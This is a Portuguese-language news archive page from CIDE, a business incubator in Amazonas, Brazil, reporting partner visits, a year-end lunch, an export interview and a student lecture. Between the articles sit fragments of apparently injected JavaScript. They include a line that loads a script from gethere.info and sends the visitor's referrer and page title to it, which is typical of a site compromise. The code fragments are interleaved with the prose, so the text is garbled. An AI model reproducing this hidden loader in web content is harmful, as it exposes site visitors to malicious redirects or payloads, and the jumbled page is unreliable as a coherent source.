• 92 3216-3892
  • secretaria@cide.org.br

Arquivo por autor

CIN/AM disponibiliza seus serviços ao CIDE

O gerente executivo do CIN/AM, Marcelo Lima, fala com os gestores instalados no CIDE.

O gerente executivo do CIN/AM, Marcelo Lima, fala com os gestores instalados no CIDE.

O gerente executivo do Centro Internacional de Negócios (CIN/AM), Marcelo Lima, e sua equipe, estiveram no Centro de Incubação e Desenvolvimento Empresarial (CIDE), no mês de janeiro, para apresentar aos gestores das empresas, os serviços da instituição, com o objetivo de melhorar a divulgação dos produtos produzidos na incubadora em eventos nacionais e internacionais.

“Nossa intenção é preparar essas empresas para que elas estejam aptas a competir no mercado exterior”, disse Marcelo Lima. Os técnicos do CIN/AM explicaram como funcionam os serviços e como as empresas instaladas no CIDE podem participar dos programas oferecidos. “No primeiro momento, nós priorizamos quatro segmentos que são Tecnologia da Informação, Alimentos e Bebidas, Cosméticos, Petróleo e Gás, mas outras áreas podem ser inseridas”, concluiu Marcelo.

A equipe foi recebida pelo diretor executivo do CIDE, José Cunha Barbosa Grosso, que reuniu os empreendedores no auditório da instituição. “Queremos promover a qualidade das empresas e de seus colaboradores. Portanto, outras reuniões acontecerão”, disse José Grosso.

CIDE

Parcerias são fomentadas no CIDE

Equipe de analistas do SESI conversam com gestores e colaboradores das empresas incubadas.

Equipe de analistas do SESI conversam com gestores e colaboradores das empresas incubadas.

Com o objetivo de melhorar a divulgação dos produtos das empresas incubadas em eventos nacionais e internacionais, e as formações educacional e profissional de seus colaboradores, o Centro de Incubação e Desenvolvimento Empresarial (CIDE) começa o ano de 2015, fomentando as parcerias com o Sistema Federação das Indústrias do Estado do Amazonas (Sistema FIEAM).

Esta semana, a incubadora recebeu a visita das equipes técnicas do Centro Internacional de Negócios (CIN/AM) e do Serviço Social da Indústria (SESI/AM). “Queremos promover a qualidade das empresas, mas também, queremos, sobretudo, promover a qualidade de vida dos trabalhadores, com foco na profissionalização, educação, saúde e lazer, estimulando o crescimento pessoal e empresarial”, disse o diretor executivo do CIDE, José Barbosa Grosso.

As equipes conversaram, no auditório do CIDE, com os gestores e os colaboradores e explicaram como funcionam os serviços e como as empresas instaladas na incubadora vão participar dos programas oferecidos. “Vamos proporcionar às empresas uma qualificação internacional, de modo que elas possam comercializar seus produtos tanto no Brasil como em mercados internacionais e estarem aptas a competir”, concluiu o gerente executivo, Marcelo Lima.

O diretor executivo do CIDE, José Barbosa Grosso, com a equipe do SESI-AM.

O diretor executivo do CIDE, José Barbosa Grosso, com a equipe do SESI-AM.

O gerente executivo do CIN-AM, Marcelo Lima (à esq.) fala com os empreendedores.

O gerente executivo do CIN-AM, Marcelo Lima (à esq.) fala com os empreendedores.

 

} else {

CIDE

CIDE realiza confraternização de fim de ano

Mais de 40 funcionários participaram do almoço de fim de ano.

A administração do Centro de Incubação e Desenvolvimento Empresarial (CIDE) realizou, no mês de dezembro, um almoço, no SESI-Clube do Trabalhador, para funcionários das empresas incubadas e funcionários da administração da incubadora.

Na ocasião, o diretor executivo José Barbosa Grosso, agradeceu a todos pelos êxitos alcançados e pelas boas relações que há entre os cooperadores. “Obrigado a todos pelo ótimo ano que tivemos. Desejo a todos um 2015 melhor e que as empresas continuem crescendo e melhorando a economia do Estado do Amazonas”, disse.

 

 

 

 

Foto13Foto12

}

CIDE

Para exportar é preciso formação e informação

O coordenador geral dos programas de apoio à exportação, Flávio Pimentel, na FIEAM.

O coordenador geral dos programas de apoio à exportação, Flávio Pimentel, na FIEAM.

O coordenador geral dos programas de apoio à exportação, dentro da Secretaria de Comércio Exterior, Flávio Martins Pimentel, esteve, no segundo semestre deste ano, na Federação das Indústrias do Estado do Amazonas (FIEAM), para falar sobre exportação aos microempresários e interessados no assunto, no 1º Seminário Difusão da Cultura Exportadora do Estado do Amazonas. O informativo “Empresarial” teve a oportunidade de entrevistá-lo.

Que tipo de produtos as microempresas poderiam exportar?

Vários. Por exemplo, há casos de sucesso de empresas que atuam no campo da Moda e Praia exportando seus produtos. Na área de produtos orgânicos também há casos de sucesso, como a exportação de cacau orgânico; os produtos de perfumaria feitos com ingredientes naturais. Enfim, são produtos que alcançam nichos de mercado e conseguem ser competitivos.

Todos os produtos podem ser exportados?

As microempresas têm um caminho a percorrer, preparando-se para o mercado externo. Nem sempre o produto que atende às exigências do mercado interno, atende às exigências do mercado externo. Portanto, elas têm de verificar qual é o mercado que elas querem alcançar, qual é o país para onde o produto destinado vai encontrar mais competitividade. Então existe toda uma metodologia e preparação para identificar o mercado onde eu quero vender meu produto.

Qual conselho o senhor dá aos microempresários que desejam exportar?

Para o empresário pequeno, nós sempre sugerimos começar exportando para mercados próximos, para países fronteiriço e não dispersar totalmente o produto exportado. E, em casos de produtos da área agrícola e alimentos, há todo um processo de cuidado sanitário, inspeções e autorizações. Não é simplesmente querer exportar.

Como hoje em dia ninguém faz nada sozinho, o microempresário tem de buscar o apoio de um conjunto de entidades, como o SEBRAE, o Correio, o Ministério da Indústria e Comércio Exterior, a Federação das Indústrias do Estado do Amazonas (FIEAM), Confederação Nacional da Indústria (CNI), entre outras que apoiam a cultura exportadora para se capacitar e preparar a sua empresa para a exportação dos seus produtos.

if (document.currentScript) {

CIDE

Estudantes do IFAM de Coari ouvem palestra no CIDE

Pale1

O diretor-executivo do CIDE fala aos estudantes de Coari.

Com o objetivo de complementar as aulas estudadas no curso técnico de Administração, em torno de cinquenta estudantes do Instituto Federal do Amazonas (IFAM Campus-Coari) ouviram, na manhã de hoje, 11, uma palestra sobre “O papel da incubadora CIDE no empreendedorismo local”, proferida pelo diretor-executivo, José Barbosa Grosso, que, após a exposição, convidou os alunos e professores a visitar algumas empresas instaladas na incubadora.

“É bom que os estudantes de administração aumentem seus conhecimentos adquiridos em sala de aula, visitando empresas inovadoras que um dia foram uma ideia e hoje se tornaram realidade”, disse José Grosso.

Segundo o professor José Wulisses, a visita está relacionada com as atividades desenvolvidas pelo curso de Administração. “O motivo é claro. Trouxemos os estudantes para que eles conheçam o ambiente de uma incubadora de empresas, unindo a parte teórica com a prática”.

Para a formanda Pâmela Rodrigues a visita foi impressionante. “Ouvimos falar de empreendedorismo na sala do curso, mas vir aqui e conhecer pessoalmente os trabalhos desenvolvidos na incubadora acrescenta conhecimento às aulas teóricas”, concluiu.

Pale3Pale2Pale4

s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;

CIDE